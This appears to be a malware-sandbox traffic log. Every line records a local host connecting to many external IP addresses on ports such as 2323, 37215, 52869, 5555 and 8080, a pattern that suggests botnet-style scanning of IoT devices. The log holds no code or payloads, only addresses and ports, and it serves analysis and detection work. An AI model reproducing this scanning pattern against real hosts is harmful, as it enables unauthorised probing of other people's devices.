Source: global traffic TCP traffic: 192.168.2.20:34010 -> 156.188.202.182:49152
Source: global traffic TCP traffic: 192.168.2.20:33218 -> 69.219.15.151:8080
Source: global traffic TCP traffic: 192.168.2.20:42230 -> 84.49.106.247:8080
Source: global traffic TCP traffic: 192.168.2.20:45606 -> 83.10.2.12:52869
Source: global traffic TCP traffic: 192.168.2.20:48022 -> 88.107.197.218:81
Source: global traffic TCP traffic: 192.168.2.20:44074 -> 137.96.65.50:52869
Source: global traffic TCP traffic: 192.168.2.20:37258 -> 57.57.176.173:52869
Source: global traffic TCP traffic: 192.168.2.20:46580 -> 103.227.10.51:37215
Source: global traffic TCP traffic: 192.168.2.20:36088 -> 110.232.182.70:8080
Source: global traffic TCP traffic: 192.168.2.20:52444 -> 94.151.112.236:8080
Source: global traffic TCP traffic: 192.168.2.20:36744 -> 162.238.7.116:8080
Source: global traffic TCP traffic: 192.168.2.20:36118 -> 92.54.230.127:8443
Source: global traffic TCP traffic: 192.168.2.20:46806 -> 84.40.114.1:8443
Source: global traffic TCP traffic: 192.168.2.20:45158 -> 82.129.200.140:5555
Source: global traffic TCP traffic: 192.168.2.20:50110 -> 125.111.112.230:8080
Source: global traffic TCP traffic: 192.168.2.20:55372 -> 70.220.45.231:8080
Source: global traffic TCP traffic: 192.168.2.20:37030 -> 198.118.3.130:8080
Source: global traffic TCP traffic: 192.168.2.20:56686 -> 200.237.209.54:81
Source: global traffic TCP traffic: 192.168.2.20:54686 -> 81.197.119.173:49152
Source: global traffic TCP traffic: 192.168.2.20:52128 -> 133.239.82.116:49152
Source: global traffic TCP traffic: 192.168.2.20:59126 -> 98.157.141.146:7574
Source: global traffic TCP traffic: 192.168.2.20:58796 -> 57.92.156.14:81
Source: global traffic TCP traffic: 192.168.2.20:33930 -> 113.188.1.54:8080
Source: global traffic TCP traffic: 192.168.2.20:35144 -> 181.104.75.138:8080
Source: global traffic TCP traffic: 192.168.2.20:60284 -> 47.248.165.151:8443
Source: global traffic TCP traffic: 192.168.2.20:36134 -> 72.90.138.133:52869
Source: global traffic TCP traffic: 192.168.2.20:52484 -> 194.182.145.31:49152
Source: global traffic TCP traffic: 192.168.2.20:43750 -> 185.2.174.16:81
Source: global traffic TCP traffic: 192.168.2.20:42568 -> 117.21.241.151:5555
Source: global traffic TCP traffic: 192.168.2.20:47142 -> 180.5.162.155:8080
Source: global traffic TCP traffic: 192.168.2.20:55012 -> 182.237.85.66:8080
Source: global traffic TCP traffic: 192.168.2.20:44776 -> 199.246.152.166:5555
Source: global traffic TCP traffic: 192.168.2.20:34774 -> 210.53.199.85:8080
Source: global traffic TCP traffic: 192.168.2.20:33624 -> 212.221.62.64:7574
Source: global traffic TCP traffic: 192.168.2.20:36926 -> 156.96.88.80:8080
Source: global traffic TCP traffic: 192.168.2.20:45316 -> 132.37.211.32:8080
Source: global traffic TCP traffic: 192.168.2.20:40466 -> 175.234.148.74:49152
Source: global traffic TCP traffic: 192.168.2.20:49152 -> 14.221.63.65:5555
Source: global traffic TCP traffic: 192.168.2.20:50354 -> 174.73.164.213:8080
Source: global traffic TCP traffic: 192.168.2.20:50416 -> 29.23.135.71:49152
Source: global traffic TCP traffic: 192.168.2.20:34532 -> 69.233.249.60:7574
Source: global traffic TCP traffic: 192.168.2.20:46394 -> 160.55.151.92:5555
Source: global traffic TCP traffic: 192.168.2.20:44238 -> 35.21.51.146:7574
Source: global traffic TCP traffic: 192.168.2.20:59442 -> 32.147.42.65:8443
Source: global traffic TCP traffic: 192.168.2.20:43632 -> 33.2.251.75:8080
Source: global traffic TCP traffic: 192.168.2.20:54614 -> 183.218.103.29:5555
Source: global traffic TCP traffic: 192.168.2.20:39410 -> 5.75.227.209:5555
Source: global traffic TCP traffic: 192.168.2.20:38294 -> 199.215.82.120:5555
Source: global traffic TCP traffic: 192.168.2.20:50336 -> 17.36.10.53:49152
Source: global traffic TCP traffic: 192.168.2.20:60594 -> 134.182.231.67:49152
Source: global traffic TCP traffic: 192.168.2.20:42208 -> 122.136.129.218:37215
Source: global traffic TCP traffic: 192.168.2.20:36418 -> 120.248.5.159:52869
Source: global traffic TCP traffic: 192.168.2.20:51006 -> 59.147.111.47:37215
Source: global traffic TCP traffic: 192.168.2.20:60616 -> 164.16.139.252:8080
Source: global traffic TCP traffic: 192.168.2.20:34832 -> 161.198.22.163:81
Source: global traffic TCP traffic: 192.168.2.20:38982 -> 87.221.52.97:37215
Source: global traffic TCP traffic: 192.168.2.20:39046 -> 152.217.15.203:37215
Source: global traffic TCP traffic: 192.168.2.20:59110 -> 179.46.171.6:49152
Source: global traffic TCP traffic: 192.168.2.20:41674 -> 47.241.133.101:5555
Source: global traffic TCP traffic: 192.168.2.20:52176 -> 90.191.172.75:8080
Source: global traffic TCP traffic: 192.168.2.20:39414 -> 182.122.123.189:49152
Source: global traffic TCP traffic: 192.168.2.20:41420 -> 177.72.194.158:8443
Source: global traffic TCP traffic: 192.168.2.20:59910 -> 28.185.19.176:5555
Source: global traffic TCP traffic: 192.168.2.20:35456 -> 115.97.124.91:7574
Source: global traffic TCP traffic: 192.168.2.20:50338 -> 105.237.227.224:81
Source: global traffic TCP traffic: 192.168.2.20:48948 -> 39.81.227.198:8080
Source: global traffic TCP traffic: 192.168.2.20:41430 -> 66.201.80.188:8080
Source: global traffic TCP traffic: 192.168.2.20:34458 -> 152.11.107.226:81
Source: global traffic TCP traffic: 192.168.2.20:44704 -> 108.181.239.177:49152
Source: global traffic TCP traffic: 192.168.2.20:48224 -> 144.243.16.74:8443
Source: global traffic TCP traffic: 192.168.2.20:53252 -> 142.30.167.231:5555
Source: global traffic TCP traffic: 192.168.2.20:46698 -> 175.225.140.166:8080
Source: global traffic TCP traffic: 192.168.2.20:46056 -> 123.30.61.15:5555
Source: global traffic TCP traffic: 192.168.2.20:37566 -> 59.207.221.29:81
Source: global traffic TCP traffic: 192.168.2.20:59874 -> 31.27.78.45:49152
Source: global traffic TCP traffic: 192.168.2.20:58714 -> 122.160.28.146:8080
Source: global traffic TCP traffic: 192.168.2.20:48538 -> 16.41.220.208:8080
Source: global traffic TCP traffic: 192.168.2.20:42676 -> 57.228.46.214:37215
Source: global traffic TCP traffic: 192.168.2.20:35054 -> 37.31.202.128:37215
Source: global traffic TCP traffic: 192.168.2.20:39548 -> 58.55.207.152:5555
Source: global traffic TCP traffic: 192.168.2.20:53082 -> 136.159.183.246:81
Source: global traffic TCP traffic: 192.168.2.20:35372 -> 103.149.102.18:5555
Source: global traffic TCP traffic: 192.168.2.20:40768 -> 33.222.3.31:8080
Source: global traffic TCP traffic: 192.168.2.20:50498 -> 181.103.164.25:8080
Source: global traffic TCP traffic: 192.168.2.20:41894 -> 87.100.168.25:52869
Source: global traffic TCP traffic: 192.168.2.20:44810 -> 58.241.10.153:8080
Source: global traffic TCP traffic: 192.168.2.20:46690 -> 200.95.166.57:8080
Source: global traffic TCP traffic: 192.168.2.20:45894 -> 130.112.113.117:81
Source: global traffic TCP traffic: 192.168.2.20:51580 -> 8.144.29.157:49152
Source: global traffic TCP traffic: 192.168.2.20:52666 -> 42.53.124.99:7574
Source: global traffic TCP traffic: 192.168.2.20:54812 -> 197.15.200.93:8080
Source: global traffic TCP traffic: 192.168.2.20:49378 -> 24.32.163.88:37215
Source: global traffic TCP traffic: 192.168.2.20:41856 -> 90.21.129.140:37215
Source: global traffic TCP traffic: 192.168.2.20:47622 -> 37.64.42.1:5555
Source: global traffic TCP traffic: 192.168.2.20:39988 -> 205.77.80.43:81
Source: global traffic TCP traffic: 192.168.2.20:39860 -> 203.1.53.83:7574
Source: global traffic TCP traffic: 192.168.2.20:44828 -> 47.154.113.173:37215
Source: global traffic TCP traffic: 192.168.2.20:35354 -> 152.58.166.168:49152
Source: global traffic TCP traffic: 192.168.2.20:47132 -> 213.40.140.209:81
Source: global traffic TCP traffic: 192.168.2.20:57736 -> 145.8.33.105:8080
Source: global traffic TCP traffic: 192.168.2.20:60134 -> 28.253.173.25:7574
Source: global traffic TCP traffic: 192.168.2.20:56872 -> 201.27.168.240:8080
Source: global traffic TCP traffic: 192.168.2.20:34020 -> 206.155.249.74:5555
Source: global traffic TCP traffic: 192.168.2.20:40352 -> 76.113.174.12:8080
Source: global traffic TCP traffic: 192.168.2.20:49478 -> 218.171.135.173:8080
Source: global traffic TCP traffic: 192.168.2.20:36712 -> 65.17.42.27:81
Source: global traffic TCP traffic: 192.168.2.20:33800 -> 62.211.221.129:8080
Source: global traffic TCP traffic: 192.168.2.20:45322 -> 151.184.228.232:5555
Source: global traffic TCP traffic: 192.168.2.20:51276 -> 197.118.111.71:8080
Source: global traffic TCP traffic: 192.168.2.20:44636 -> 157.56.20.190:52869
Source: global traffic TCP traffic: 192.168.2.20:43284 -> 190.242.154.163:8443
Source: global traffic TCP traffic: 192.168.2.20:60544 -> 209.217.136.33:8443
Source: global traffic TCP traffic: 192.168.2.20:53088 -> 197.34.177.11:7574
Source: global traffic TCP traffic: 192.168.2.20:42104 -> 200.11.181.4:8080
Source: global traffic TCP traffic: 192.168.2.20:59404 -> 138.165.59.57:5555
Source: global traffic TCP traffic: 192.168.2.20:46302 -> 214.142.165.206:8080
Source: global traffic TCP traffic: 192.168.2.20:47772 -> 162.47.171.24:81
Source: global traffic TCP traffic: 192.168.2.20:39376 -> 133.102.114.241:8443
Source: global traffic TCP traffic: 192.168.2.20:42298 -> 47.185.80.40:7574
Source: global traffic TCP traffic: 192.168.2.20:48118 -> 146.102.243.179:8080
Source: global traffic TCP traffic: 192.168.2.20:34552 -> 126.3.6.151:8080
Source: global traffic TCP traffic: 192.168.2.20:48666 -> 161.135.213.110:8080
Source: global traffic TCP traffic: 192.168.2.20:46100 -> 147.52.239.132:8080
Source: global traffic TCP traffic: 192.168.2.20:59478 -> 16.110.179.40:81
Source: global traffic TCP traffic: 192.168.2.20:40970 -> 51.227.15.209:5555
Source: global traffic TCP traffic: 192.168.2.20:36536 -> 61.139.164.151:7574
Source: global traffic TCP traffic: 192.168.2.20:37048 -> 36.220.148.252:52869
Source: global traffic TCP traffic: 192.168.2.20:59440 -> 109.74.141.76:81
Source: global traffic TCP traffic: 192.168.2.20:48834 -> 159.220.41.142:8080
Source: global traffic TCP traffic: 192.168.2.20:34748 -> 56.129.128.4:8443
Source: global traffic TCP traffic: 192.168.2.20:40680 -> 165.253.189.217:7574
Source: global traffic TCP traffic: 192.168.2.20:41478 -> 109.143.31.175:8080
Source: global traffic TCP traffic: 192.168.2.20:58770 -> 53.225.147.229:81
Source: global traffic TCP traffic: 192.168.2.20:38008 -> 179.151.12.46:37215
Source: global traffic TCP traffic: 192.168.2.20:53420 -> 39.113.188.47:5555
Source: global traffic TCP traffic: 192.168.2.20:45746 -> 137.110.66.54:37215
Source: global traffic TCP traffic: 192.168.2.20:56722 -> 58.72.15.174:7574
Source: global traffic TCP traffic: 192.168.2.20:57116 -> 37.24.4.73:8080
Source: global traffic TCP traffic: 192.168.2.20:41086 -> 133.159.154.248:5555
Source: global traffic TCP traffic: 192.168.2.20:51276 -> 177.96.47.102:8080
Source: global traffic TCP traffic: 192.168.2.20:33854 -> 164.132.96.134:8080
Source: global traffic TCP traffic: 192.168.2.20:43502 -> 169.217.227.38:81
Source: global traffic TCP traffic: 192.168.2.20:39492 -> 176.120.19.238:81
Source: global traffic TCP traffic: 192.168.2.20:38436 -> 146.40.106.239:5555
Source: global traffic TCP traffic: 192.168.2.20:59770 -> 207.23.54.245:52869
Source: global traffic TCP traffic: 192.168.2.20:34510 -> 50.126.123.128:52869
Source: global traffic TCP traffic: 192.168.2.20:33606 -> 151.67.70.41:49152
Source: global traffic TCP traffic: 192.168.2.20:49222 -> 8.168.18.238:5555
Source: global traffic TCP traffic: 192.168.2.20:55430 -> 161.39.154.190:37215
Source: global traffic TCP traffic: 192.168.2.20:50260 -> 77.125.96.189:8080
Source: global traffic TCP traffic: 192.168.2.20:38300 -> 128.99.168.15:8080
Source: global traffic TCP traffic: 192.168.2.20:57658 -> 47.41.35.192:8080
Source: global traffic TCP traffic: 192.168.2.20:33782 -> 59.47.52.108:37215
Source: global traffic TCP traffic: 192.168.2.20:58046 -> 190.114.242.248:49152
Source: global traffic TCP traffic: 192.168.2.20:45440 -> 142.184.135.34:8443
Source: global traffic TCP traffic: 192.168.2.20:47166 -> 24.10.221.243:49152
Source: global traffic TCP traffic: 192.168.2.20:39320 -> 114.19.106.118:37215
Source: global traffic TCP traffic: 192.168.2.20:43220 -> 37.173.108.182:81
Source: global traffic TCP traffic: 192.168.2.20:33198 -> 135.248.124.244:8080
Source: global traffic TCP traffic: 192.168.2.20:42216 -> 74.232.146.139:8080
Source: global traffic TCP traffic: 192.168.2.20:37460 -> 193.98.148.181:37215
Source: global traffic TCP traffic: 192.168.2.20:36780 -> 90.142.76.81:8080
Source: global traffic TCP traffic: 192.168.2.20:56962 -> 25.23.192.39:8443
Source: global traffic TCP traffic: 192.168.2.20:44442 -> 4.23.193.21:7574
Source: global traffic TCP traffic: 192.168.2.20:43352 -> 143.226.183.246:8080
Source: global traffic TCP traffic: 192.168.2.20:35304 -> 125.11.86.219:81
Source: global traffic TCP traffic: 192.168.2.20:35950 -> 117.139.2.64:8080
Source: global traffic TCP traffic: 192.168.2.20:57090 -> 158.180.15.87:81
Source: global traffic TCP traffic: 192.168.2.20:59182 -> 125.232.30.122:52869
Source: global traffic TCP traffic: 192.168.2.20:56960 -> 64.90.35.78:37215
Source: global traffic TCP traffic: 192.168.2.20:52400 -> 92.187.181.216:49152
Source: global traffic TCP traffic: 192.168.2.20:60720 -> 81.36.208.25:37215
Source: global traffic TCP traffic: 192.168.2.20:50502 -> 119.218.221.67:52869
Source: global traffic TCP traffic: 192.168.2.20:53688 -> 171.23.120.90:8080
Source: global traffic TCP traffic: 192.168.2.20:60266 -> 37.76.48.72:5555
Source: global traffic TCP traffic: 192.168.2.20:38596 -> 79.229.187.191:37215
Source: global traffic TCP traffic: 192.168.2.20:42990 -> 146.248.14.242:8080
Source: global traffic TCP traffic: 192.168.2.20:40152 -> 52.248.111.32:7574
Source: global traffic TCP traffic: 192.168.2.20:45888 -> 198.127.94.178:8080
Source: global traffic TCP traffic: 192.168.2.20:48972 -> 188.48.235.83:52869
Source: global traffic TCP traffic: 192.168.2.20:39410 -> 149.24.10.86:5555
Source: global traffic TCP traffic: 192.168.2.20:55100 -> 152.135.244.87:8080
Source: global traffic TCP traffic: 192.168.2.20:55312 -> 178.76.140.206:8080
Source: global traffic TCP traffic: 192.168.2.20:41806 -> 130.40.195.154:81
Source: global traffic TCP traffic: 192.168.2.20:43102 -> 119.113.24.153:7574
Source: global traffic TCP traffic: 192.168.2.20:47100 -> 208.213.191.219:8080
Source: global traffic TCP traffic: 192.168.2.20:45186 -> 206.150.7.5:37215
Source: global traffic TCP traffic: 192.168.2.20:59398 -> 216.95.211.133:8443
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 117.98.169.106:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 187.174.210.99:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 80.28.25.86:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 206.47.55.60:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 117.15.195.151:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 150.135.224.55:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 84.162.120.168:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 38.187.0.109:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 90.178.36.52:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 83.169.4.66:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 78.25.35.0:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 176.251.107.19:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 166.139.210.202:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 45.255.135.222:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 64.60.156.172:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 170.28.13.241:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 69.148.51.105:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 94.119.137.8:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 78.58.120.106:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 125.31.207.97:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 169.247.212.103:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 86.1.120.215:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 201.145.205.246:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 176.17.112.147:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 180.249.225.38:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 54.126.72.39:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 207.220.37.255:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 156.124.19.178:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 9.119.106.44:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 125.196.149.212:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 218.52.94.240:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 206.22.158.92:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 149.165.201.122:2323
Source: global traffic TCP traffic: 192.168.2.20:36286 -> 151.235.98.188:52869
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 70.142.209.180:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 19.67.205.237:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 67.232.197.142:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 145.214.33.95:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 161.26.89.62:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 62.190.128.79:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 197.86.174.173:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 114.99.17.241:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 189.179.160.80:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 91.223.186.181:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 34.126.231.244:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 57.97.159.30:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 74.34.224.22:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 164.100.155.219:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 115.145.169.30:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 77.206.48.106:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 102.86.201.96:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 23.66.190.127:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 171.82.232.134:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 23.134.142.150:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 76.120.94.75:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 126.39.183.239:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 204.15.252.204:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 60.19.190.113:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 24.111.17.40:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 180.58.196.188:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 23.141.250.44:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 221.104.222.102:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 174.231.155.97:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 13.111.18.70:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 18.132.143.23:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 207.221.231.94:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 74.156.135.124:2323
Source: global traffic TCP traffic: 192.168.2.20:32832 -> 72.116.52.243:8443
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 195.182.237.244:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 157.9.213.184:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 156.149.46.74:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 175.243.55.238:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 181.229.246.160:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 173.96.113.131:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 211.160.156.9:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 200.233.160.240:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 96.150.185.206:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 2.223.160.174:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 109.168.201.230:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 98.110.180.156:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 188.182.24.215:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 202.100.225.66:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 108.80.251.155:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 188.151.208.67:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 67.136.137.120:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 178.127.63.205:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 72.252.87.71:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 63.205.40.16:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 79.115.27.234:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 35.64.204.253:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 209.143.238.124:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 82.92.199.247:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 115.122.10.41:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 200.79.154.190:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 66.226.192.6:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 179.52.72.165:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 178.106.158.1:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 152.75.61.215:1023
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 99.146.105.31:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 153.48.151.95:2323
Source: global traffic TCP traffic: 192.168.2.20:12122 -> 203.122.112.94:2323
Source: global traffic TCP traffic: 192.168.2.20:59544 -> 157.20.10.149:81
Source: global traffic TCP traffic: 192.168.2.20:42124 -> 63.188.189.233:8443
Source: global traffic TCP traffic: 192.168.2.20:43584 -> 62.238.173.138:7574
Source: global traffic TCP traffic: 192.168.2.20:39864 -> 102.217.189.148:8080
Source: global traffic TCP traffic: 192.168.2.20:58152 -> 198.152.181.234:49152
Source: global traffic TCP traffic: 192.168.2.20:48704 -> 20.154.149.216:8080
Source: global traffic TCP traffic: 192.168.2.20:57762 -> 50.172.44.166:8443
Source: global traffic TCP traffic: 192.168.2.20:32842 -> 44.207.80.65:8080
Source: global traffic TCP traffic: 192.168.2.20:57258 -> 43.161.129.170:8080
Source: global traffic TCP traffic: 192.168.2.20:35344 -> 16.216.117.103:7574
Source: global traffic TCP traffic: 192.168.2.20:56296 -> 48.111.167.94:49152
Source: global traffic TCP traffic: 192.168.2.20:44748 -> 21.44.246.61:49152
Source: global traffic TCP traffic: 192.168.2.20:43884 -> 211.98.118.186:81
Source: global traffic TCP traffic: 192.168.2.20:44378 -> 67.213.164.194:8080
Source: global traffic TCP traffic: 192.168.2.20:51006 -> 73.168.42.71:8080
Source: global traffic TCP traffic: 192.168.2.20:36092 -> 207.45.206.85:37215
Source: global traffic TCP traffic: 192.168.2.20:35316 -> 38.115.189.82:8080
Source: global traffic TCP traffic: 192.168.2.20:36154 -> 8.196.85.46:8080
Source: global traffic TCP traffic: 192.168.2.20:52714 -> 169.231.254.119:5555
Source: global traffic TCP traffic: 192.168.2.20:37056 -> 189.25.210.17:8443
Source: global traffic TCP traffic: 192.168.2.20:56744 -> 102.162.109.251:81
Source: global traffic TCP traffic: 192.168.2.20:53314 -> 93.118.156.27:37215
Source: global traffic TCP traffic: 192.168.2.20:33544 -> 156.30.203.234:8443
Source: global traffic TCP traffic: 192.168.2.20:37616 -> 96.227.71.31:8080
Source: global traffic TCP traffic: 192.168.2.20:55648 -> 91.23.94.89:8080
Source: global traffic TCP traffic: 192.168.2.20:38442 -> 43.30.240.136:8443
Source: global traffic TCP traffic: 192.168.2.20:44360 -> 114.15.113.65:8080
Source: global traffic TCP traffic: 192.168.2.20:35250 -> 126.165.195.44:8080
Source: global traffic TCP traffic: 192.168.2.20:43476 -> 168.152.12.184:49152
Source: global traffic TCP traffic: 192.168.2.20:42328 -> 185.198.59.136:7574
Source: global traffic TCP traffic: 192.168.2.20:41498 -> 63.191.13.133:8080
Source: global traffic TCP traffic: 192.168.2.20:52652 -> 139.249.198.163:5555
Source: global traffic TCP traffic: 192.168.2.20:50270 -> 22.122.201.176:8080
Source: global traffic TCP traffic: 192.168.2.20:33924 -> 159.133.144.14:8080
Source: global traffic TCP traffic: 192.168.2.20:36110 -> 183.43.207.246:37215
Source: global traffic TCP traffic: 192.168.2.20:49440 -> 22.142.197.254:49152
Source: global traffic TCP traffic: 192.168.2.20:36466 -> 205.119.206.192:7574
Source: global traffic TCP traffic: 192.168.2.20:58704 -> 74.5.113.71:7574
Source: global traffic TCP traffic: 192.168.2.20:56056 -> 191.137.127.161:8443
Source: global traffic TCP traffic: 192.168.2.20:47620 -> 67.96.246.134:5555
Source: global traffic TCP traffic: 192.168.2.20:51942 -> 85.217.68.43:49152
Source: global traffic TCP traffic: 192.168.2.20:32816 -> 117.25.227.147:8443
Source: global traffic TCP traffic: 192.168.2.20:58336 -> 83.113.163.141:37215
Source: global traffic TCP traffic: 192.168.2.20:60880 -> 95.68.187.209:8443
Source: global traffic TCP traffic: 192.168.2.20:56160 -> 105.205.64.147:52869
Source: global traffic TCP traffic: 192.168.2.20:36858 -> 89.129.131.73:8080
Source: global traffic TCP traffic: 192.168.2.20:53906 -> 150.211.192.100:37215
Source: global traffic TCP traffic: 192.168.2.20:34958 -> 155.238.66.118:49152
Source: global traffic TCP traffic: 192.168.2.20:57126 -> 31.57.44.152:37215
Source: global traffic TCP traffic: 192.168.2.20:59494 -> 178.149.93.21:8080
Source: global traffic TCP traffic: 192.168.2.20:40610 -> 169.5.83.203:7574
Source: global traffic TCP traffic: 192.168.2.20:48244 -> 48.145.15.35:7574
Source: global traffic TCP traffic: 192.168.2.20:49132 -> 161.96.234.20:37215
Source: global traffic TCP traffic: 192.168.2.20:57092 -> 202.72.100.208:52869
Source: global traffic TCP traffic: 192.168.2.20:47052 -> 198.134.133.19:52869
Source: global traffic TCP traffic: 192.168.2.20:43012 -> 6.37.90.74:37215
Source: global traffic TCP traffic: 192.168.2.20:33624 -> 92.103.103.47:37215
Source: global traffic TCP traffic: 192.168.2.20:60776 -> 19.61.113.43:7574
Source: global traffic TCP traffic: 192.168.2.20:40486 -> 99.181.137.45:8080
Source: global traffic TCP traffic: 192.168.2.20:37512 -> 171.192.201.93:52869
Source: global traffic TCP traffic: 192.168.2.20:33650 -> 88.153.234.30:8080
Source: global traffic TCP traffic: 192.168.2.20:33378 -> 184.151.108.119:8080
Source: global traffic TCP traffic: 192.168.2.20:52078 -> 37.38.172.114:37215
Source: global traffic TCP traffic: 192.168.2.20:55364 -> 3.55.225.207:5555
Source: global traffic TCP traffic: 192.168.2.20:44412 -> 53.253.84.232:5555
Source: global traffic TCP traffic: 192.168.2.20:48418 -> 166.130.48.19:5555
Source: global traffic TCP traffic: 192.168.2.20:36482 -> 28.244.244.163:37215
Source: global traffic TCP traffic: 192.168.2.20:59618 -> 113.161.190.188:52869
Source: global traffic TCP traffic: 192.168.2.20:50044 -> 118.143.200.102:8080
Source: global traffic TCP traffic: 192.168.2.20:47252 -> 46.177.88.163:8080
Source: global traffic TCP traffic: 192.168.2.20:49984 -> 157.228.242.122:81
Source: global traffic TCP traffic: 192.168.2.20:53300 -> 20.149.201.53:8080
Source: global traffic TCP traffic: 192.168.2.20:58690 -> 198.225.2.23:49152
Source: global traffic TCP traffic: 192.168.2.20:45076 -> 160.64.230.81:52869
Source: global traffic TCP traffic: 192.168.2.20:51264 -> 139.159.32.150:8443
Source: global traffic TCP traffic: 192.168.2.20:46258 -> 74.35.20.129:81
Source: global traffic TCP traffic: 192.168.2.20:43480 -> 170.150.75.145:81
Source: global traffic TCP traffic: 192.168.2.20:60366 -> 209.185.236.134:81
Source: global traffic TCP traffic: 192.168.2.20:41370 -> 154.210.234.104:8080
Source: global traffic TCP traffic: 192.168.2.20:59728 -> 50.48.206.45:7574
Source: global traffic TCP traffic: 192.168.2.20:58308 -> 18.73.233.15:8443
Source: global traffic TCP traffic: 192.168.2.20:35666 -> 216.193.98.28:8443
Source: global traffic TCP traffic: 192.168.2.20:47722 -> 8.195.111.22:5555
Source: global traffic TCP traffic: 192.168.2.20:44058 -> 57.53.105.210:52869
Source: global traffic TCP traffic: 192.168.2.20:54806 -> 152.234.42.42:37215
Source: global traffic TCP traffic: 192.168.2.20:48540 -> 220.165.10.156:8080
